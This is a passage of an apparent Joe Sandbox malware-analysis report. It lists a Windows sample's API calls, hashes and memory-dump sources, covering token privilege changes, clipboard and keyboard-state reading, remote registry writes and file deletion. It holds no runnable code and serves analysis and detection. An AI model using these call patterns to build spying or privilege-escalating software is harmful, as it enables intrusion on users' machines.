                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: 08f0c0bd05be166b482e762efcdbb7170e1cca1c8bad589bd00d63cd3da4241f
                                                    • Instruction ID: 587849f00ab80a7d861fb452bbc2dd767f410a41c05f262d5746580de13b7835
                                                    • Opcode Fuzzy Hash: 08f0c0bd05be166b482e762efcdbb7170e1cca1c8bad589bd00d63cd3da4241f
                                                    • Instruction Fuzzy Hash: 02317371A4031C7BEB216B619C4AF7F3F6DFB45B50F14402AFA04BA1D1CAB55D50AEA0
                                                    APIs
                                                      • Part of subcall function 007C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C93E3
                                                      • Part of subcall function 007C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C9410
                                                      • Part of subcall function 007C9399: GetLastError.KERNEL32 ref: 007C941D
                                                    • _memset.LIBCMT ref: 007C8F71
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007C8FC3
                                                    • CloseHandle.KERNEL32(?), ref: 007C8FD4
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007C8FEB
                                                    • GetProcessWindowStation.USER32 ref: 007C9004
                                                    • SetProcessWindowStation.USER32(00000000), ref: 007C900E
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007C9028
                                                      • Part of subcall function 007C8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8F27), ref: 007C8DFE
                                                      • Part of subcall function 007C8DE9: CloseHandle.KERNEL32(?,?,007C8F27), ref: 007C8E10
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: f728518d6fbdd603e46dc59c214672ef636ce3c17a8a4529ebf9d68fef4cc370
                                                    • Instruction ID: 452fbd277c5de89b0264ee76da6235071f376f70c3d4d13ad6be50efb56a8756
                                                    • Opcode Fuzzy Hash: f728518d6fbdd603e46dc59c214672ef636ce3c17a8a4529ebf9d68fef4cc370
                                                    • Instruction Fuzzy Hash: D08148B190420DBFDF519FA4DC4AFEE7B79BF04304F08411DFA10A6261DB3A8A159B61
                                                    APIs
                                                    • OpenClipboard.USER32(00800980), ref: 007E465C
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 007E466A
                                                    • GetClipboardData.USER32(0000000D), ref: 007E4672
                                                    • CloseClipboard.USER32 ref: 007E467E
                                                    • GlobalLock.KERNEL32(00000000), ref: 007E469A
                                                    • CloseClipboard.USER32 ref: 007E46A4
                                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 007E46B9
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 007E46C6
                                                    • GetClipboardData.USER32(00000001), ref: 007E46CE
                                                    • GlobalLock.KERNEL32(00000000), ref: 007E46DB
                                                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 007E470F
                                                    • CloseClipboard.USER32 ref: 007E481F
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: 35304d4d88814f985f664b358bc2f366e216654f90ffd6a2f18dfc4e8741ba1d
                                                    • Instruction ID: db46a3a4eea26a13d05df09005d46a0f859d3174f9f11b455da9284ed5d986fb
                                                    • Opcode Fuzzy Hash: 35304d4d88814f985f664b358bc2f366e216654f90ffd6a2f18dfc4e8741ba1d
                                                    • Instruction Fuzzy Hash: AF51DC31245381ABD300EF61DC89F6E73A8BF98B40F000529F65AD22E1DF78D8058F66
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 007DF5F9
                                                    • _wcscmp.LIBCMT ref: 007DF60E
                                                    • _wcscmp.LIBCMT ref: 007DF625
                                                    • GetFileAttributesW.KERNEL32(?), ref: 007DF637
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 007DF651
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 007DF669
                                                    • FindClose.KERNEL32(00000000), ref: 007DF674
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007DF690
                                                    • _wcscmp.LIBCMT ref: 007DF6B7
                                                    • _wcscmp.LIBCMT ref: 007DF6CE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007DF6E0
                                                    • SetCurrentDirectoryW.KERNEL32(0082B578), ref: 007DF6FE
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF708
                                                    • FindClose.KERNEL32(00000000), ref: 007DF715
                                                    • FindClose.KERNEL32(00000000), ref: 007DF727
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*$S}
                                                    • API String ID: 1803514871-2863189289
                                                    • Opcode ID: 587fe9491fbb95030189621e9cf3dffb1edbfd88b5c684ad6f0c7bce3a06f415
                                                    • Instruction ID: 8165a75c1f5ed666bc5abf5a910d83f9dab933f21b9d68b8b93cd01af3c5fd05
                                                    • Opcode Fuzzy Hash: 587fe9491fbb95030189621e9cf3dffb1edbfd88b5c684ad6f0c7bce3a06f415
                                                    • Instruction Fuzzy Hash: 00319571641219BADF509FB4EC4DAEE77BCEF09321F540166F816E22A0DB38DA44DE60
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 007DCDD0
                                                    • FindClose.KERNEL32(00000000), ref: 007DCE24
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DCE49
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DCE60
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 007DCE87
                                                    • __swprintf.LIBCMT ref: 007DCED3
                                                    • __swprintf.LIBCMT ref: 007DCF16
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                    • __swprintf.LIBCMT ref: 007DCF6A
                                                      • Part of subcall function 007938C8: __woutput_l.LIBCMT ref: 00793921
                                                    • __swprintf.LIBCMT ref: 007DCFB8
                                                      • Part of subcall function 007938C8: __flsbuf.LIBCMT ref: 00793943
                                                      • Part of subcall function 007938C8: __flsbuf.LIBCMT ref: 0079395B
                                                    • __swprintf.LIBCMT ref: 007DD007
                                                    • __swprintf.LIBCMT ref: 007DD056
                                                    • __swprintf.LIBCMT ref: 007DD0A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3953360268-2428617273
                                                    • Opcode ID: 194bd1e24c39801518e8c53060e7fd8acb68d3cc43991ccb8cfcf244c4e19058
                                                    • Instruction ID: 1bce222e9a643b1aa5f505217226e0306c9372204d89ad3c560e6eca9d40d9cd
                                                    • Opcode Fuzzy Hash: 194bd1e24c39801518e8c53060e7fd8acb68d3cc43991ccb8cfcf244c4e19058
                                                    • Instruction Fuzzy Hash: 28A13DB1404305EBD715EBA4D989DAFB7ECFF94700F404919F589C6191EB38EA09CBA2
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0FB3
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00800980,00000000,?,00000000,?,?), ref: 007F1021
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007F1069
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007F10F2
                                                    • RegCloseKey.ADVAPI32(?), ref: 007F1412
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 007F141F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: d200f459c3e7ae8959d2a25ab8df189f7a6aadc924586bd02c420c048d72f754
                                                    • Instruction ID: 3c5b974fb452d10821406128dd331c05df517947c58689cab352f6ef24fbcc54
                                                    • Opcode Fuzzy Hash: d200f459c3e7ae8959d2a25ab8df189f7a6aadc924586bd02c420c048d72f754
                                                    • Instruction Fuzzy Hash: B1022675200615DFCB24EF25C855A2AB7E5FF89710F04895CFA9A9B362CB38EC41CB91
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 007DF756
                                                    • _wcscmp.LIBCMT ref: 007DF76B
                                                    • _wcscmp.LIBCMT ref: 007DF782
                                                      • Part of subcall function 007D4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007D4890
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 007DF7B1
                                                    • FindClose.KERNEL32(00000000), ref: 007DF7BC
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007DF7D8
                                                    • _wcscmp.LIBCMT ref: 007DF7FF
                                                    • _wcscmp.LIBCMT ref: 007DF816
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007DF828
                                                    • SetCurrentDirectoryW.KERNEL32(0082B578), ref: 007DF846
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF850
                                                    • FindClose.KERNEL32(00000000), ref: 007DF85D
                                                    • FindClose.KERNEL32(00000000), ref: 007DF86F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*$j}
                                                    • API String ID: 1824444939-110696414
                                                    • Opcode ID: 42ebf6451e9a48b0863a2bef7584ceb7351c4a4b2623157253bb21b4af12f372
                                                    • Instruction ID: 1978482bd5678b78cc21e95c87b5d2ed0da2f6fc54aeacf1964e96f8f0c223de
                                                    • Opcode Fuzzy Hash: 42ebf6451e9a48b0863a2bef7584ceb7351c4a4b2623157253bb21b4af12f372
                                                    • Instruction Fuzzy Hash: 5231B871501219BEDF10ABB4EC48ADE77BCEF09321F104166E815E63A1DB38DE459F51
                                                    APIs
                                                      • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
                                                      • Part of subcall function 007C8E20: GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
                                                      • Part of subcall function 007C8E20: GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
                                                      • Part of subcall function 007C8E20: HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
                                                      • Part of subcall function 007C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73
                                                      • Part of subcall function 007C8EBD: GetProcessHeap.KERNEL32(00000008,007C8916,00000000,00000000,?,007C8916,?), ref: 007C8EC9
                                                      • Part of subcall function 007C8EBD: HeapAlloc.KERNEL32(00000000,?,007C8916,?), ref: 007C8ED0
                                                      • Part of subcall function 007C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C8916,?), ref: 007C8EE1
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C8931
                                                    • _memset.LIBCMT ref: 007C8946
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C8965
                                                    • GetLengthSid.ADVAPI32(?), ref: 007C8976
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 007C89B3
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C89CF
                                                    • GetLengthSid.ADVAPI32(?), ref: 007C89EC
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C89FB
                                                    • HeapAlloc.KERNEL32(00000000), ref: 007C8A02
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C8A23
                                                    • CopySid.ADVAPI32(00000000), ref: 007C8A2A
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C8A5B
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C8A81
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C8A95
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 3996160137-0
                                                    • Opcode ID: f16d53b53266bfbce8790af0ff32d0758d3f9cb26690006afec17ba79f9cf1ff
                                                    • Instruction ID: 2b773c433b1d5d5d8a16738fd1dc5c8020f4d99afeda8f18582fbacd97542c53
                                                    • Opcode Fuzzy Hash: f16d53b53266bfbce8790af0ff32d0758d3f9cb26690006afec17ba79f9cf1ff
                                                    • Instruction Fuzzy Hash: C4610675A00209EFDF40DFA5DC45FEEBB79BB44300F04812EE915AA291DB399A15CFA1
                                                    APIs
                                                      • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0B0C
                                                      • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                      • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007F0BAB
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007F0C43
                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007F0E82
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 007F0E8F
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                    • String ID:
                                                    • API String ID: 1240663315-0
                                                    • Opcode ID: e55ba4d0c08330279ff6ba2a2f8cb4e9f6aa26abfb0fa01d7d5b421f40dd2785
                                                    • Instruction ID: 7b397809ab43630b7e9ab929d78811a1b25570e095095042f41271f9a78e563a
                                                    • Opcode Fuzzy Hash: e55ba4d0c08330279ff6ba2a2f8cb4e9f6aa26abfb0fa01d7d5b421f40dd2785
                                                    • Instruction Fuzzy Hash: 13E13A71204214EFCB14EF25C895E2ABBE9EF89714F04896DF949DB362DA34E901CB91
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 007D0530
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 007D05B1
                                                    • GetKeyState.USER32(000000A0), ref: 007D05CC
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 007D05E6
                                                    • GetKeyState.USER32(000000A1), ref: 007D05FB
                                                    • GetAsyncKeyState.USER32(00000011), ref: 007D0613
                                                    • GetKeyState.USER32(00000011), ref: 007D0625
                                                    • GetAsyncKeyState.USER32(00000012), ref: 007D063D
                                                    • GetKeyState.USER32(00000012), ref: 007D064F
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 007D0667
                                                    • GetKeyState.USER32(0000005B), ref: 007D0679
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 4b76b592c6679f431dc3596f756be8cd16a6a0a490a4f7f1a1401cd997b94ef1
                                                    • Instruction ID: d589e712306399073522d1aac5ced109870c8b987b37c22b9ffb9f72223165ac
                                                    • Opcode Fuzzy Hash: 4b76b592c6679f431dc3596f756be8cd16a6a0a490a4f7f1a1401cd997b94ef1
                                                    • Instruction Fuzzy Hash: 2541C4345047CA6DFF708A6498047B5BEB06B51304F08619BD9C6577C2EAACD9E8CFE2
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 007D4451
                                                    • __swprintf.LIBCMT ref: 007D445E
                                                      • Part of subcall function 007938C8: __woutput_l.LIBCMT ref: 00793921
                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 007D4488
                                                    • LoadResource.KERNEL32(?,00000000), ref: 007D4494
                                                    • LockResource.KERNEL32(00000000), ref: 007D44A1
                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 007D44C1
                                                    • LoadResource.KERNEL32(?,00000000), ref: 007D44D3
                                                    • SizeofResource.KERNEL32(?,00000000), ref: 007D44E2
                                                    • LockResource.KERNEL32(?), ref: 007D44EE
                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007D454F
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                    • String ID:
                                                    • API String ID: 1433390588-0
                                                    • Opcode ID: 66ca1e44739a7b823ccabf518ce40b280085016c80ef91204ace50762af33562
                                                    • Instruction ID: 9e58948659f9e8fa2296819beae02d78ac3bf3dcbcb6d89d8cd9adfcb1634282
                                                    • Opcode Fuzzy Hash: 66ca1e44739a7b823ccabf518ce40b280085016c80ef91204ace50762af33562
                                                    • Instruction Fuzzy Hash: 94317E7150125AABDF119FA0EC49EBB7BB8FF04301F004826F916D6251EB78DA61CBB0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                    • String ID:
                                                    • API String ID: 1737998785-0
                                                    • Opcode ID: 6be783b75bbcd7985c2ce6de17fe8b969f084bfc684a80e93f4e48ed5b234e60
                                                    • Instruction ID: 5a8e88fd8cd5bbae52288570fe0f658254f2c06f46fcefa298c2d325fa5c0573
                                                    • Opcode Fuzzy Hash: 6be783b75bbcd7985c2ce6de17fe8b969f084bfc684a80e93f4e48ed5b234e60
                                                    • Instruction Fuzzy Hash: 8B219131205250EFDB51AF25EC09F2E77A9FF98711F008019F94A9B261CB39AD00CF95
                                                    APIs
                                                      • Part of subcall function 00790284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00782A58,?,00008000), ref: 007902A4
                                                      • Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 007D3D96
                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007D3E3E
                                                    • MoveFileW.KERNEL32(?,?), ref: 007D3E51
                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007D3E6E
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007D3E90
                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007D3EAC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                    • String ID: \*.*
                                                    • API String ID: 4002782344-1173974218
                                                    • Opcode ID: b948de47856503188a42abc8aca01d73afde9037ca136aab7b970f3e70bd79bc
                                                    • Instruction ID: b000644190952bd17356e2caa7984847fff811a5fc2eb415d45e646bded8a1e7
                                                    • Opcode Fuzzy Hash: b948de47856503188a42abc8aca01d73afde9037ca136aab7b970f3e70bd79bc
                                                    • Instruction Fuzzy Hash: 5A51843184114DEACF15FBA0D99A9EDB779AF10301F644166E441B3291DF396F0ACB61
                                                    APIs
